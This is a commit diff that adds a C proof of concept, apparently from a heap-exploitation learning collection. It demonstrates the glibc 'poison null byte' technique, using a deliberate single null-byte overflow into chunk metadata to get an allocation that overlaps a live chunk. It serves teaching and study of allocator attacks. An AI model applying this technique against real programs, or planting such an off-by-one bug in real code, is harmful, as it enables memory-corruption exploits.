update 3.3.6

2025-06-24 04:05:03 +07:00 · 2018-01-13 23:52:15 +08:00
parent bf8f3d4038
commit 9c7a282f07
3 changed files with 412 additions and 1 deletions
--- a/src/Others/3.3.5_heap_exploit/poison_null_byte.c
+++ b/src/Others/3.3.5_heap_exploit/poison_null_byte.c
@ -0,0 +1,68 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+#include <malloc.h>
+
+int main() {
+    uint8_t *a, *b, *c, *b1, *b2, *d;
+
+    a = (uint8_t*) malloc(0x10);
+    int real_a_size = malloc_usable_size(a);
+    fprintf(stderr, "We allocate 0x10 bytes for 'a': %p\n", a);
+    fprintf(stderr, "'real' size of 'a': %#x\n", real_a_size);
+
+    b = (uint8_t*) malloc(0x100);
+    c = (uint8_t*) malloc(0x80);
+    fprintf(stderr, "b: %p\n", b);
+    fprintf(stderr, "c: %p\n", c);
+
+    uint64_t* b_size_ptr = (uint64_t*)(b - 0x8);
+    *(size_t*)(b+0xf0) = 0x100;
+    fprintf(stderr, "b.size: %#lx ((0x100 + 0x10) | prev_in_use)\n\n", *b_size_ptr);
+    
+    // deal with tcache
+    // int *k[10], i;
+    // for (i = 0; i < 7; i++) {
+    //     k[i] = malloc(0x100);
+    // }
+    // for (i = 0; i < 7; i++) {
+    //     free(k[i]);
+    // }
+    free(b);
+    uint64_t* c_prev_size_ptr = ((uint64_t*)c) - 2;
+    fprintf(stderr, "After free(b), c.prev_size: %#lx\n", *c_prev_size_ptr);
+
+    a[real_a_size] = 0; // <--- THIS IS THE "EXPLOITED BUG"
+    fprintf(stderr, "We overflow 'a' with a single null byte into the metadata of 'b'\n");
+    fprintf(stderr, "b.size: %#lx\n\n", *b_size_ptr);
+
+    fprintf(stderr, "Pass the check: chunksize(P) == %#lx == %#lx == prev_size (next_chunk(P))\n", *((size_t*)(b-0x8)), *(size_t*)(b-0x10 + *((size_t*)(b-0x8))));
+    b1 = malloc(0x80);
+    memset(b1, 'A', 0x80);
+    fprintf(stderr, "We malloc 'b1': %p\n", b1);
+    fprintf(stderr, "c.prev_size: %#lx\n", *c_prev_size_ptr);
+    fprintf(stderr, "fake c.prev_size: %#lx\n\n", *(((uint64_t*)c)-4));
+
+    b2 = malloc(0x40);
+    memset(b2, 'A', 0x40);
+    fprintf(stderr, "We malloc 'b2', our 'victim' chunk: %p\n", b2);
+
+    // deal with tcache
+    // for (i = 0; i < 7; i++) {
+    //     k[i] = malloc(0x80);
+    // }
+    // for (i = 0; i < 7; i++) {
+    //     free(k[i]);
+    // }
+    free(b1);
+    free(c);
+    fprintf(stderr, "Now we free 'b1' and 'c', this will consolidate the chunks 'b1' and 'c' (forgetting about 'b2').\n");
+
+    d = malloc(0x110);
+    fprintf(stderr, "Finally, we allocate 'd', overlapping 'b2': %p\n\n", d);
+
+    fprintf(stderr, "b2 content:%s\n", b2);
+    memset(d, 'B', 0xb0);
+    fprintf(stderr, "New b2 content:%s\n", b2);
+}